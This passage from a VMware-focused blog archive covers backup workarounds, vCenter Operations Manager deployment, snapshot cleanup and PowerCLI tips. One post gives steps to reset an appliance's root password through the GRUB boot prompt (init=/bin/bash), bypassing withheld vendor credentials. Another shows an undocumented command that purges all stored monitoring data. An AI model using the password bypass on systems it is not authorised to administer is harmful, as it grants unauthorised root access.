https://vNinja.net/virtualization/its-average-data-its-vopendata/ Date: 2013-04-12 Author: Tags: Awesome, Community, Statistics So, what is the average airspeed velocity of an unladen swallow? As we all (should) know, that is very much a trick question. Now, consider this little non-trick question: I wonder what the avg disk size is for your virtual machine these days. I do most math with 60GB on avg, but wonder if that has changed > [@DuncanYB](https://twitter.com/DuncanYB/status/317269670195507203) / March 28th 2013 And now, guess what? Just 16 days later, a brand new data mining tool has emerged based on that initial question. vOpenData is now live, in an attempt to answer these kinds of questions. Simplistically put, this site gathers anonymous data from your virtual infrastructure and puts it into a global dataset ready for analysis and presentation. As data is contributed from various sources, the public dashboard is updated. Another great community driven resource is born, this time by Ben Thomas and William Lam. Announcement posts: [vOpenData – Crunching Everyone’s Data For Fun And Knowledge](vOpenData – Crunching Everyone’s Data For Fun And Knowledge) vOpenData: An Open Virtualization Community Database Check it out and help out by contributing your data if you can. --- # Brilliant idea: VMware Hosted Beta URL: https://vNinja.net/vmware-2/brilliant-idea-vmware-hosted-beta/ Date: 2013-03-27 Author: christian Tags: Beta, Hands-on Labs, HoL, Hosted Beta, labs, Virtualization, VMware Duncan Epping rather unceremoniously published a blog post “New Beta Program offering: VMware Hosted Beta” yesterday, outlining the availability of the new hosted beta offering that companions some of the current VMware beta programs. Due to the very NDA nature of the beta programs, I can´t really go into details on what is currently offered, but what I can say is this: Well done VMware! The VMware Hosted Beta runs on the same engine that runs the VMware Hands on Labs Online – Beta, but with a little added twist. You connect to the hosted beta through a web interface, before the actual connection is handed over to a locally installed VMware Horizon View client. This works very well, and I got to play around a bit with it a bit yesterday. The idea of a hosted beta like this really resonates with me, as one of the major time sinks when it comes to actively participating in betas is the physical setup of a lab environment. As I am currently without a properly powerful lab, something that will change very soon I hope, getting hosted beta access could not be more welcome. This way I get to dip my toes in the beta offerings, without having to procure the required hardware. While I don´t think the hosted beta replaces the need for a dedicated physical lab, it sure does work as an excellent stop-gap in the mean time. It also means that you can jump in and out of various pieces of the beta, without having to spend a lot of time configuring an environment from scratch. In addition, this also means that you can get a working environment set up in a matter of minutes, and all you need is love an internet connection. Of course, VMware does not want everyone to run all their beta testing in this environment, they need feedback on installation and configuration issues in “real world” scenarios as well as plain old feature testing in a controlled environment, but this is a very welcome addition in my mind. Kudos to the HoL and Beta teams at VMware, this makes my day so much easier and I am sure it will also help them in getting better feedback from us beta testers. --- # Backing up vCenter DB with Veeam B&R 6.5 URL: https://vNinja.net/virtualization/backing-up-vcenter-db-with-veeam-br-6-5/ Date: 2013-03-25 Author: Tags: automation, Backup, Ops, realworld, vCenter, Veeam, VMware, vSphere, workaround It´s a well known problem that with Veeam Backup & Recovery Replication 6.5, and earlier, backing up the SQL server that hosts the vCenter DB poses a problem. KB1051 VSS for vCenter outlines the issue well, and provides a workaround. If you experience this problem, you will see entries like this in your Veeam B&R backup logs: Veeam vCenterDB Backup Error The workaround provided by Veeam is to create host VM-Host Affinity Rules, effectively pinning a VM to a given host, and then perform the VM backup through the host rather than through the vCenter. While this might be a way to work around the failed backup scenario, it effectively limits some of the flexibility you have in a virtualized environment. I want to have my VMs roaming around my datacenter utilizing DRS, and by pinning the VM to a given host that flexibility is reduced for the VMs in question. I can appreciate why this issue appears, and why the workaround works, but frankly there has to be a better way of doing this. Hopefully this issue will be sorted in the next v7 version of Veeam B&R, as there certainly are ways for Veeam to work around the issue and make this a more seamless experience for the backup administrator. Proposal # Why not create a new option in the backup job, where you define that this particular job should run through a host, instead of the vCenter? If selected, Veeam B&R would query the vCenter for which host the given VM resides on, then connect to the host itself and perform the backup through that? That way we could work without having to set VM-host Affinity Rules, yet still keep vCenter out of the loop when the actual backup is performed. Doing such a query is pretty easy, below is an example using PowerCLI: Get-VMHost -VM dbserv | fl -Property Name Name : esx02 This simple query returns the host that the given VM resides on at the given time, why not do something like this inside of Veeam B&R to make sure that vCenter DB backups work, without having to resort to VM-Host Affinity Rules? --- # Preserve your Veeam B&R Backups Jobs when Moving vCenter URL: https://vNinja.net/virtualization/preserve-veeam-br-backups-jobs-moving-vcenter/ Date: 2013-03-19 Author: christian Tags: Ops, vCenter, Veeam, Veeam Backup & Replication, VMware, vSphere, workaround This week I´m working at a client site, upgrading their entire existing vSphere 4.1 infrastructure to vSphere 5.1. The customer engagement also includes upgrading Veeam Backup and Replication 6.0 to 6.5, and usually an isolated upgrade of Veeam B&R is a no-brainer next, next, next, done install. To complicate things in this particular environment, I also had to migrate the vCenter SQL DB from a local MS SQL Server 2005 Express instance to a full-fledged MS SQL Server 2008 R2 instance. Of course, it was also decided to move the vCenter installation from a physical server, to a VM in the same operation. To be able to have an exit path, until the vSphere 4.1 hosts management agents, were reconfigured, a new vCenter VM was created with a new IP-adress and server name. After the migration from vCenter 4.1 to 5.1, and from physical to virtual was completed, the existing Veeam B&R server was upgraded to the latest 6.5 release. Now, this is where things started to get a bit interesting with regards to the existing Veeam B&R backup jobs. As far as it was concerned, the new vCenter was unknown and the old one was no longer anywhere to be found on the network. If you add the new vCenter to the Veeam B&R server, you will need to either redefine all the existing backup jobs by adding the same VM from the new vCenter to the existing job, and keep the old one around until your retention period has passed (and have it fail on the existing VM object until it´s removed) or you will have to recreate all the jobs pointing to the new vCenter instance and start new “first time backups” for all the VMs. For some reason you simply can not rename/redefine your vCenter connection inside of the Veeam B&R GUI. Thankfully there is an easy way to work around this issue, without having to mess about with the Veeam B&R database: Create a DNS alias! That´s right, the solution was that simple. I created a DNS CNAME alias pointing the old vCenter network name to the new vCenter network name. After doing that, I had to re-enter the credentials for the vCenter connection in Veeam B&R to force a reconnect, and all of a sudden all existing backups jobs where present again and working as intended. The reason this works, is that when you change the vCenter name and/or IP address (or even move it to a new server) it does not change the VM identification number (vmid) or Managed Object Reference (MoRef), in essence the VMs stay the same and Veeam B&R can continue managing them as before. Now, can we please get an option to update the registered vCenter name in Veeam Backup & Replication v7.0? Update: Check out Veeam vCenter Migration Utility for a small utility to help you move Veeam B&R jobs after replacing your vCenter. --- # Autolab goes Cloudy with a Chance of Free Credits URL: https://vNinja.net/virtualization/autolab-meets-cloud/ Date: 2013-03-14 Author: christian Tags: Alastair Cooke, Autolab, Cloud, Freebie, fun, Lab, Mike Laverick, VMware, vSphere Autolab, that awesome “little” thing that automagically builds a nested vSphere Lab environment for you, was definitely not put together by Flint Lockwood but by Alastair Cooke (www.demitasse.co.nz). Unlike Flint´s inventions, this one actually makes sense and serves a purpose! Now, how sweet would it be to deploy Autolab without having to invest time, money and effort into acquiring your own hardware? Well, thanks to baremetalcloud.com, you might now actually be able to do just that (and more, if you wish). Of course, this is a paid service but Mike Laverick has secured a deal where the 100 first sign-ups using his promo code gets free credits to play around with! For more details, including promo code and setup information, check “Bare Metal Cloud for your Auto-Lab” --- # Keep Calm And ... URL: https://vNinja.net/virtualization/calm/ Date: 2013-03-02 Author: christian Tags: fun, Keep Calm, Posters I needed some new wall “art” for my home office, and decided that a couple of small “Keep Calm” posters would do the trick. Naturally I got a bit carried away, and created more than one, and of course, most of them are virtualization related: If you have some ideas, I´ll gladly create more, just leave a comment! I would also love photos if you printed out any of these and put them on a wall or in a frame somewhere. Or even better, on a T-Shirt! --- # Want a Free Pass to TechEd 2013? URL: https://vNinja.net/news/free-pass-teched-2013/ Date: 2013-02-26 Author: christian Tags: contest, fun, Give-away, Veeam Our sponsor Veeam is giving away a free pass to TechEd 2013 in this months giveaway. Register now to be entered into the draw before March 18th when the winner will be announced. --- # Trainsignal: Training as a Service (TaaS) URL: https://vNinja.net/news/trainsignal-training-service-taas/ Date: 2013-02-22 Author: christian Tags: Certification, Cisco, Microsoft, Training, Trainsignal, VMware Trainsignal has just launched a new Online Training bundle, and for $49 a month you can get unlimited access to their entire set of training courses and practice exams for Cisco, Apple, Microsoft, Citrix, CompTIA, and VMware. The new pricing is very attractive, especially since you no longer need to buy access on a course by course basis. The courses are delivered in your browser, but Trainsignal also offers an offline player in case you need access when traveling or otherwise offline. Give it a test run today, by signing up now (referral link) you get three days full access for free. --- # New Fling from VMware Labs: Makyo URL: https://vNinja.net/vmware-2/fling-vmware-labs-makyo/ Date: 2013-02-21 Author: christian Tags: Fling, Makyo, Plugin, Suggestion, VMware VMware Labs has released a new fling called Makyo (魔境 makyō means “ghost cave” or “devil’s cave.”) which basically is a tool to copy VMs or vApps from one vCenter instance to another. It works by doing an automated OVF export on the source vCenter, and then an import on the destination vCenter. The plugin integrates directly into the vSphere Web Client, and I hope to see this feature installed by default in future versions of the Web Client. A small suggestion: # I hope that in future versions of Makyo, you could use the same tool to copy VMs or vApps from standalone ESXi hosts into your vCenter infrastructure. Today you can use VMware Workstation to move and copy between local to Workstation storage, standalone ESXi hosts and vCenter managed infrastructure and adding the same kind of feature set to the Web Client would be great. It would make it easier to migrate from small test environments to live production environments, all inside the vSphere Web Client. --- # Voting Open for the 2013 Top VMware & Virtualization Blogs URL: https://vNinja.net/virtualization/voting-open-2013-top-vmware-virtualization-blogs/ Date: 2013-02-20 Author: christian Tags: bloggers, vlaunchpad, Vote, vsphere-land Eric Siebert has yet again gone through the massive job of setting up his yearly Top VMware & Virtualization Blogs Vote. Huge kudos to Eric, I know this is a big undertaking for you, and myself and the rest of the community really appreciate the hard work you put into this each year! Go ahead and cast your vote before the cut-off date of March 1st. vNinja.net is listed in the general section, feel free to vote for us if you feel like we deserve it. --- # Unsupported Network Configurations in Virtual Appliances URL: https://vNinja.net/vmware-2/unsupported-network-configurations-virtual-appliances/ Date: 2013-02-19 Author: christian Tags: fun, labs, Linux, SUSE, Unsupported, Virtual Appliance, VMware, vSphere My recent experience with setting up vCenter Operations Manager on a standalone ESXi host, and the always excellent William Lam´s post Automating VCSA Network Configurations For Greenfield Deployments got me thinking. There are several other appliances out there that require deployment to a vCenter, to be able to configure the networking options and not just default to DHCP. In many, and perhaps even most, cases you can work around that by running the _vami_set_network _command to change from DHCP to STATIC network configurations. All of that is fine and dandy, and pretty straight forward, but there is one smallish caveat; You need root access to be able to reconfigure the networking. Without it, you will see error messages such as these (Shortened for abbreviation): @localhost:~/opt/vmware/share/vami/vami_set_network eth0 STATICV4 192.168.5.98 255.255.255.0 192.168.5.1 /sbin/ifdown: line 233: /dev/.sysconfig/network/config-eth0: Permission denied IOError: [Errno 13] Permission denied: '/opt/vmware/etc/vami/vami_ovf_info.xml' Unable to set the network parameters So, what if you don´t know the appliance root password? Most virtual appliances are Linux based, and in this particular case the flavor used was SUSE Enterprise Linux 11. To reset the root password on a grub based Linux appliance, like SUSE, follow the recipe below: Note: As William Lam pointed out this procedure only works if there no grub password set, if that´s the case download a LiveCD, mount the filesystem and run the password change from there. If the filesystem in the appliance is encrypted, well, then all bets are off. In the grub menu select the kernel you want to boot and press tab to shift focus to “Boot Options” Now type init =/bin/bash and press Enter to continue. You will see a prompt that looks like (none):/ # in the terminal. Run the passwd command in terminal to change the password for root. (none):/ # passwd New Password: Reenter New Password: Password changed. Reboot the appliance, let it boot up normally, and you should now be able to log on as root, with your newly configured password, and run the _vami_set_network _command to configure static IP adressing. localhost:~ # /opt/vmware/share/vami/vami_set_network eth0 STATICV4 192.168.5.19 255.255.255.0 192.168.5.1 eth0 device: Intel Corporation 82545EM Gigabit Ethernet Controller (Copper) (rev 01) eth0 device: Intel Corporation 82545EM Gigabit Ethernet Controller (Copper) (rev 01) Network parameters successfully changed to requested values localhost:~ # Do yet another reboot, and you should be up and running with a static IP configuration on an appliance deployed without the advanced OVF/OVA properties normally required for that kind of deployment. This procedure is more than likely NOT supported by your vendor, and changing the root password might have other consequences for the appliance. If the vendor does not supply the root password i their documentation, there is likely to be a reason for that, but the procedure above shows that not supplying it does not actually prevent anyone from changing it. USE AT OWN RISK. --- # Purging the vCenter Operations Manager 5.x Database URL: https://vNinja.net/vmware-2/purging-vcenter-operations-manager-5-x-database/ Date: 2013-02-05 Author: christian Tags: vCenter, vCenter Operations Manager, Virtualization, VMware A client of mine recently had their vCenter 5.0 appliance replaced with a new vCenter 5.1 appliance, something vCenter Operations Manager did not enjoy. In this case the original vCenter 5.0 Appliance was turned shut down, a new 5.1 Appliance deployed, with the same IP as the old one, and then configured. Naturally the existing hosts were added to the fresh vCenter, clusters recreated and in general everything was reconfigured. Why a simple upgrade from 5.0 to 5.1 wasn’t performed is beyond me, but the end result was that the existing vCenter Operations Manager I had deployed in this environment was no longer able to monitor the environment. Simply removing the registration of the old vCenter and replacing it with the new instance was not trivial, as this generated an exception in the vCenter Operations Manager admin interface: Exception occurred during vCenter Server registration. UUID is not available for the currently registered vCenter ([https:///sdk). This can happen if you added the vCenter from custom UI instead of the admin UI. Please contact support to fix the problem and then attempt to register a new vCenter. Trying to force the registration from the command line on the vCenter Operations Manager UI VM using the following command also failed, with the same error message: vcops-admin register update --vc-name [vc-name] --vc-server [https://vc-server/sdk] --username [vc-username] --password [vc-password] --force Naturally the issue is caused by the non-standard “upgrade” performed on the vCenter, but the end result that I no longer had old performance data available anywhere. The vCenter database was no longer available, since no actual upgrade was performed and the old vCenter had been removed from vCenter Operations Manager. My first thought was to simply delete and re-deploy vCenter Operations Manager, but since I was working remotely this wasn’t really a viable option, considering that the OVF package was located on my local machine and not in the clients network After some playing around to try to avoid deploying again over a slow WAN link, I discovered a somewhat undocumented parameter for the vcops-admin (run on the UI VM command line) command. vcops-admin purge --vc-name This parameter is not listed in the man pages for the vcops-admin command, and what it does is to completely purge a previously registered vCenter. And by purge, it really means purge. All traces of the old vCenter data is removed from the vCenter Operations Manager database, any old performance data and metrics are completely removed. In my case this was exactly what I was looking for, since the alternative was to redeploy the whole vCenter Operations Manager package. Normally this is not something you want to do, it would be preferable to figure out the root cause of your issues instead of purging your existing database and lose historic data, but in some cases this can come in handy. One example would be if you are playing around with vCenter Operations Manager in your lab environment, this is a quick and easy way to start over instead of re-deploying. --- # Goodbye Mr. Herrod URL: https://vNinja.net/vmware-2/goodbye-mr-herrod/ Date: 2013-01-23 Author: christian Tags: News, Quote, Steve Herrod, VMware SearchserverVirtualization published an article today called “Experts weigh in on CTO Herrod’s departure, future of VMware” where I have been quoted in regard to Steve Herrod’s departure from VMware. While the quote itself is correct, I feel that there is a need to further expand on what I said, in the context it was given in. So here it is, my entire response: My reaction to Steve Herrods departure is probably on par with just about everyone else's, one of surprise. While I cannot comment on the internal workings of VMware, Mr. Herrods impact and influence on their public image has been immense and his shoes will be very hard to fill. That being said, I cannot imagine that VMware does not have a plan in place for this new post-Herrod era, it may be news to us, but I'm certain that this is something that has been known internally for quite some time. Mr. Herrod has been very vocal, and influential, and replacing him is not something VMware should treat lightly. Steve put much emphasis on the T in CTO, and whoever is to replace him needs to be on par with the technical level of his predecessor, after all that’s where mr. Herrod excelled. He knows the tech, and knows how to market it both to executives and techies alike, no small feat in itself. On the other hand, VMware does have as a very passionate and vocal community, and I’m sure that there is someone lurking in the shadows just waiting for the opportunity to step up into the light and move VMware forward. Each time high profile executives has left VMware, and there has been a few, VMware has excelled and not looked back. I hope, and believe that the same will be true this time around, after all VMware is driven by engineers not marketing or executive level positions. The tech is at heart, at least that’s my impression. Lastly, I would like to thank Steve Herrod for his tenure at VMware. He´s been a leading light and a reliable voice in an ever changing world. I wish him the best of luck in his future endeavors, not that I think he’ll need it, people of Steve´s calibre seldom needs luck. (yes, yes, I know. It should have been Dr. Herrod) --- # vCenter Operations Manager and vCenter Deployment Dependency URL: https://vNinja.net/vmware-2/vcenter-operations-manager-vcenter-deployment-dependency/ Date: 2013-01-16 Author: christian Tags: vCenter, vCenter Operations Manager, Virtualization, VMware, vSphere, workaround In order to be able to deploy vCenter Operations Manager, the ESXi host it is deployed to needs to be managed by a vCenter. At first glance, that seems like a fair and pretty straight forward requirement, right? But, is it? While I can see the need for a vCenter in the environment that vCenter Operations Manager is supposed to monitor, I don´t understand why the host you want to deploy the vApp on has to be managed by a vCenter instance as well? I encountered this exact scenario at a client site today; What do you do if you want to deploy vCenter Operations Manager on a standalone ESXi host, and have it monitor a production vSphere environment, which has a running vCenter installation? The vCenter Operations Manager 5 Deployment and Configuration Guide clearly states that in order to deploy and run the vCenter Operations vApp vCenter Server 4.0 U2 or later is required: vCenter Server and ESX Requirements: The vCenter Operations Manager vApp requires the following vSphere environment. vCenter Operations Manager is compatible with: System that serves as the target of data collection: VMware vCenter Server 4.0 U2 or later System running the vApp: VMware vCenter Server 4.0 U2 or later Host running the vApp: ESX/ESXi 4.0 or higher And in the Deploy the vCenter Operations Manager vApp section of the same document: Do not deploy vCenter Operations from an ESX host. Deploy only from vCenter Server. The reason why the client wanted to deploy vCenter Operations on a standalone, unmanaged host, was pretty simple; They are experiencing some rather serious performance issues, and wanted to use vCenter Operations Manager to help identify the bottlenecks and document them, but did not want vCenter Operations Manager itself to influence the performance of the production cluster(s). I was able to “work around” the issue by temporarily setting up a vCSA, in trial mode, register the ESXi host, deploy the vCenter Operations Manager vApp to the new vCSA, configure it and then subsequently shut it down again. In fact, there is even an option in the configuration to not monitor the vCenter instance it´s deployed on, so someone else must have had some mildly similar thoughts at one point. While this will work, its not ideal having to go through loops like this to deploy a management solution. I´ll happily admit that this is a fringe case, and not the most common deployment scenario, but I would still like to see VMware do something about the vCenter requirement for the host the vApp is deployed on. Requiring vCenter for the hosts and cluster it´s monitoring is fine, and expected, but why does the host it´s deployed on require it? --- # Dell (VKernel) vOPS Server Explorer 6.3 Released URL: https://vNinja.net/virtualization/dell-vkernel-vops-server-explorer-6-3-released/ Date: 2013-01-14 Author: christian Tags: Dell, Free Tool, Monitoring, Release, Virtualization, VKernel, vOPS vOPS 6.3 Environment Explorer Yesterday fellow vExpert Mattias Sundling gave me a little pre-release briefing of the new Dell/VKernel vOPS Server Explorer 6.3 release. While I don´t normally do press release posts like these, I´m willing to make an exception in this case. Not only is vOPS Server Explorer 6.3 available in a free version, with the familiar tools from previous versions, the new release also comes armed with a couple of new interesting tools in the suite: Storage Explorer Extensive storage performance and capacity views across datastores and VMs Identifies critical datastore issues such as overcommitment, low capacity, high latency, VMFS version mismatch Identifies critical VM issues such as low available disk space, high latency and throughput Allows user to sort on any metric to find specific issues relevant to them Change Explorer Lists all changes that occurred to datacenters, clusters, resource pools, hosts, datastores and VMs within the last seven days with associated risk impact Allows user to filter on object name, user and type to find specific changes Number of changes also represented graphically over time to be able to see when they are occurring Both of these are new tools in v6.3 of the vOPS Suite, and incredible value for a free product. The familiar tools from previous versions are still available too: Environment Explorer Identify critical VM configuration errors such as memory limits and old snapshots Recognize performance bottlenecks Detect inefficiency/waste created by VMs with resource over-allocation Find available capacity expressed as the number of additional VMs that can be deployed vScope Explorer Visualize performance issues in VMs and hosts across the environment Assess environment-wide host capacity Spot inefficient datastores and VMs See all VMs, hosts and datastores across many vCenters and data centers on one screen SearchMyVM Explorer Search for VMs, hosts, clusters and resource pools in an environment Create and save advanced searches Export search results in XML, CSV and PDF format In addition to the new tools, vOPS™ can connect to and monitor Hyper-V (Requires System Center) and RedHat hypervisors from a single appliance deployed once in your infrastructure. The vOPS minimum requirements are also not that bad compared with other monitoring solutions on the market: 2 vCPUs 4 GB of memory 64 GB of storage space VMware ESX 3.0 or vCenter 2.5 or higher Microsoft SCOM 2007 R2 or higher + SCVMM 2008 R2 or higher Red Hat Enterprise Virtualization Manager 3.0 or higher Watch the videos above, and if this is something you find interesting, head on over to the vOPS™ Server Explorer site and download your free copy now! --- # Want a VMware Workstation License? URL: https://vNinja.net/virtualization/vmware-workstation-license/ Date: 2013-01-10 Author: christian Tags: contest, fun, VMware, Workstation Christopher Kusek, who runs pkguild.com, has just announced that he is running a contest where you can win a VMware Workstation 9 license. Seeing that announcement, and the fact that Christopher was nice enough to mention both me and vNinja.net in it, I have decided to also give away a license that has been lingering unused in my possession way to long. Instead of running my own contest, my license has been added to the existing contest so head on over there to read all the details. If VMware Workstation does not tickle your fancy, perhaps Luigi Danakos VMware Fusion 5- Contest is more up your alley. Good luck! --- # Fun and Games with VDR and Snapshots URL: https://vNinja.net/virtualization/fun-games-vdr-snapshots/ Date: 2013-01-10 Author: christian Tags: Datastore, Snapshot, VDR, VMware, vSphere One of the smaller improvements in vSphere 5 was the introduction of the “Virtual machine disks consolidation is needed” configuration alert if vSphere determines that there are orphaned snapshots for a given VM. Previous versions does not show this warning message, and datastore usage could potentially skyrocket for no apparent reason if something continues to create snapshots that are not properly cleaned up when they are no longer in use. Unless there is active space monitoring for your datastores, and there should be, it could go on unnoticed for some time. Running a snapshot consolidation attempts to clean up this situation, and remove the orphaned snapshots reclaiming the space they occupy. This video from VMware shows how this is done, and how it should work: For more info, have a look at KB2003638 Consolidating snapshots in vSphere 5.x While it is great that you get alerted when this happens, and that there is an option to clean it up directly in the vSphere Client, what do you do if consolidation doesn´t work for some reason? I recently visited a client who had problems with their VDR appliance, and every attempted backup left orphaned snapshots behind. By default VDR has a retry interval of 30 minutes for failed backups (BackupRetryInterval=30 in datarecovery.ini), before it times out. In the space of 30 minutes, VDR did 30 backup attempts, effectively creating 30 orphaned snapshots each time a backup was attempted. One of the affected VMs had over 300 delta files accumulated over a fairly small timeframe. There clearly were a lot of snapshots in the datastore, but for some reason the vSphere Client Snapshot Manager did not show any snapshots for the VM. Clearly there was an inconsistency here, and after investigating the VM.vmsd file it became fairly apparent what was going on. The VM.vmsd file is responsible for keeping tabs of the snapshot delta-vmdk files and is the source that the Snapshot Manager uses to display and manage them. The case here was that when a snapshot is removed, the snapshot entity in the VM.vmsd is removed before the changes are made to the child disks. When VDR subsequently had problems removing the child disks, they were being left behind. Combine this situation with the fact that the maximum redo logs supported is 255, you can quickly run into a situation where there are snapshots left behind that you can´t get easily rid of with the consolidate command. Cloning the VM was not really an option, since a clone operation actually consolidates snapshots as part of the cloning process, it would also fail with the same error. In the end, the solution was to fire up VMware vCenter Converter, and use that to perform a V2V “conversion” of the VMs. Why does this work, when a “native” vSphere clone operation does not? The answer is surprisingly simple, vCenter Converter does not know the virtual disk structure at all. It sees only that what the operating system sees, and the OS inside the VM has no concept or knowledge of the snapshots created in vCenter. While this fixed the immediate issue of getting rid of the orphaned snapshots and reclaim the space wasted by them, it does not fix the underlying root issue that causes VDR not to clean up after itself. For some reason it looks like VDR, after mounting the snapshot files to the appliance, does not release them, thus retaining a lock on the snapshot files, This in turn means that the VM.vmsd file is cleared for VDR snapshots, but the files are still present on on the datastore. --- # VMware Hands-on Lab Online Public Beta Review URL: https://vNinja.net/vmware-2/vmware-hands-on-lab-online-review/ Date: 2012-12-06 Author: christian Tags: Hands-on Lab, HoL, Online Training, VMware A little while ago VMware announced Project Nee, something I was, and still am, pretty excited about. This afternoon I finally got access to the Hands-on Labs Online Beta part of Project Nee, and I have to say, this looks incredibly promising and useful. At the moment, the available labs are: Cloud Infrastructure: # HOL-INF-02 - Explore vSphere 5.1 Distributed Switch (vDS) New Features — This lab explores the new features of the vSphere Distributed Switch (vDS). HOL-INF-03 - Automate Your vSphere 5.1 Deployment with Auto Deploy — Learn how to use VMware Auto Deploy to scale and manage ESXi deployments or upgrades. HOL-INF-04 - Deliver Optimal Performance with VMware vSphere 5.1 — This lab will step you through performance monitoring, troubleshooting, and optimization options in VMware vSphere 5.1. HOL-INF-05 - VMware Site Recovery Manager (SRM) — In this lab you will leverage various VMware technologies to implement disaster recovery protection for a vCloud Director managed infrastructure. HOL-INF-06 - Deploy and Operate Your Cloud with the VMware vCloud Suite — Learn how to build and use the Virtual Datacenter with the vCloud Suite as introduced by Steve Herrod at VMworld 2012. This lab is presented as two 30 minute lightning lab modules. HOL-INF-07 - VMware vCloud Networking and Security (vCNS) — Learn the fundamentals of software defined networking in the VMware vCloud Suite using vCloud Networking and Security (vCNS). Cloud Operations # HOL-OPS-01 - VMware vCenter Operations Manager Enterprise — This lab covers automated performance, capacity, and configuration management with VMware vCenter Operations Manager Enterprise. HOL-OPS-05 - Explore VMware vCenter Operations Manager Enterprise New Features — In this lab you will use new features of VMware vCenter Operations Manager Enterprise edition for performance monitoring, troubleshooting, and optimization of VMware vSphere infrastructure. HOL-OPS-07 - VMware vCenter Orchestrator - “The Undiscovered Country” — This lab introduces the little known yet powerful automation solution, VMware vCenter Orchestrator. End-User Computing # HOL-EUC-03 - Troubleshoot and Optimize VMware View — This lab covers new performance features in View 5.1 with two 30 minute lightning lab modules. HOL-EUC-04 - Discover VMware Horizon Application Manager — Explore VMware Horizon Application Manager through two 15 minute and one 30 minute lightning lab module. Clearly there is a good collection of good content here, and as the catalog gradually expands I´m sure we´re in for a lot of great lab modules still in development. Sample screenshots # User Experience # For now I´ve only done a quick run through of the HOL-OPS-01 - VMware vCenter Operations Manager Enterprise lab, but I must say that the user experience was responsive and intuitive. I had no problem navigating the lab environment and accessing the virtual machine consoles directly in my browser (Safari). The lab guide/manual was clear and to the point, and even included troubleshooting steps in case something didn´t behave as expected. This is, as far as I can gather, this is the same platform Project Nee will use for the online training VMware will offer in the future My Verdict # I´m impressed. The Hands-on Lab Beta looks great, and behaves according to it´s appearance. As the content catalog grows, this will quickly become an invaluable resource for every vAdmin out there, my only concern is how it will be priced when it hits general release. --- # VMware vSphere Health Check - What´s in it for You? URL: https://vNinja.net/vmware-2/vmware-vsphere-health-checks-wha/ Date: 2012-12-04 Author: christian Tags: Best Practice, ESXi, Health Check, realworld, vCenter, VMware, vSphere VMware vSphere Health Check is a service provided by VMware Professional Services, either by their own consultants or by a consultant from a VMware Certified Solution Provider. I´m lucky enough to be employed by a Premier VMware Solution Provider who offers this service to our customers, and I´ve completed a fair number of these health checks in the last couple of months. You might ask what the value of the Health Check is, and for the end customer it´s pretty clear cut. They get a very detailed report on the current status of their vSphere infrastructure, complete with action items and concise recommendations for improvements. Of course, I sell these service professionally and therefore I´m biased by default. What I want to focus on here though, is not the value customers get out of the Health Check, but rather the incredible learning opportunity this service provides for you as a consultant. The data gathering part of the Health Check is done via software developed by VMware. The software is provided in two flavors, either as a ThinApped Windows Application or as a virtual appliance that you deploy in the customers environment. Pick your poison, but I´ve mostly worked with the ThinApp version. It gathers a lot of interesting data from the target vCenter, and you can then take that data with you and generate a report based on that. That´s where the fun starts. The HealthAnalyzer software comes with a web interface where you can look at everything it collected and prioritize the different findings. Of course, it also comes with suggested priorities from VMware, for the given data. This is where the learning is for everyone conducting the health checks. By reading, and understanding the automated observations generated through the data collection you have a wealth of information available, complete with “best practices” recommendations from VMware (These are updated quarterly). “Best practices” is in itself a loaded term, and you should not blindly follow them without knowing what actually makes a best practice just that. It might not be applicable in the environment you are analyzing, but the thought process involved with looking at the data and determining if this is applicable has a lot of value in and of itself. Of course, like any good consultant the real answer is always “it depends…” Examples # It´s hard to come up with arguments against the situation in the screenshot, but this is just an example of how detailed the information provided is. Some observations even come with links to relevant documentation providing more background on why something is recommended: For me, this has been an invaluable resource for learning and understanding why VMware recommends certain practices. If you work for a service provider, do yourself a big favor and check if you have access to the HealthAnalyzer software on VMware Partner Central and if you do, download and play around with it. Even if you don´t plan on doing these checks as a service for new or existing customers, running it after you have done an install is a great, and automated, way of checking if your installation adheres to the standards it should. And who knows, chances are that you´ll end up learning a lot in the process. There is just no way that can be wrong. --- # VMware vCenter Operations Manager 5.6 Available URL: https://vNinja.net/virtualization/vmware-vcenter-operations-manager-5-6/ Date: 2012-11-30 Author: christian Tags: Release, vCenter Operations Manager, VMware, vSphere The new vCenter Operations Manager 5.6 is now generally available, and one of many improvements from v5.5 is the new licensing scheme. The new foundation edition, is the new entry-level edition which from now on is included in every licensed vSphere edition free of charge. That´s right, you can now run vCenter Operations Manager 5.6 Foundation without purchasing any additional licenses. vCenter Operations Manager now comes in the following flavors: vCenter Operations Manager Foundation vCenter Operations Management Suite Standard vCenter Operations Management Suite Advanced vCenter Operations Management Suite Enterprise For more details on the different editions and comparisons between them have a look VMware vCenter Operations Management Suite Of course, vCenter Operations Manager 5.6 is compatible with the new vCenter 5.1 Web Client, integrating directly into the web interface. Details on other new features and fixes in v5.6 is available in the What´s New section of the official release notes. Also worth noting is that vCenter Operations Manager 5.6 VMware vCenter Server 4.0 Update 2 and later, managing hosts running ESX/ESXi 4.0 and later, which means that if you have an active SnS with VMware, you should be entitled to run the new foundation edition even if you haven´t upgraded your infrastructure to v5.1 just yet. In fact, you no longer have no excuse to not have a current health status for your critical virtual infrastructure. --- # Exporting vCenter Events with PowerCLI URL: https://vNinja.net/virtualization/exporting-vcenter-events-powercli/ Date: 2012-11-30 Author: christian Tags: automation, ESXi, Oneliner, PowerCLI, Powershell, realworld, vCenter, Virtualization, vSphere, vSphere 5, vSphere Client One of my clients has recently been having issues with their storage solution, and wanted to export the events from vCenter that show storage performance degradation, to aid in troubleshooting with the vendor. For some reason, and I have yet to confirm that this is a bug with the vCenter 5.0 appliance or the vCenter Desktop Client, when an event export is done, the storage related events are not exported with the rest of the events. Thankfully we were able to get the event details exported using the following PowerCLI oneliner: PowerCLI C:\log> Get-VIEvent -Start 19/11/2012 -Finish 30/11/2012 | Export-Csv "events.csv" -NoTypeInformation -UseCulture This generates an events.csv file in the current directory, containing all the events in the given timeframe, from the vCenter it is connected to. And yes, the storage related events missing from the vCenter Desktop Client export are indeed included in the file generated by the Get-VIEvent cmdlet. Once again, PowerCLI to the rescue! --- # VIP VCP Club 2012 URL: https://vNinja.net/vmware-2/vip-vcp-club-2012/ Date: 2012-11-15 Author: christian Tags: event, fun, Norway, VCP, VIP VCP Club, VMware What is VIP VCP Club? # This a new concept by VMware Norway, for certified VMware professionals, where the idea is to gather local certified VMware Professionals for a day of hands-on labs, specialized technical sessions and general community building. Agenda # Storage/HA/DR/Clustering Presented by Lee Dilworth End User Computing Presented by Joel Lindberg vCenter Operations Management Suite Presented by Ulf Andreasson The hands-on labs covered VMware Site Recovery Manager, vCenter Operations and Horizon Suite. The event itself was great, especially the speaker quality! Sadly the hands-on labs had too little time allotted to them, making it 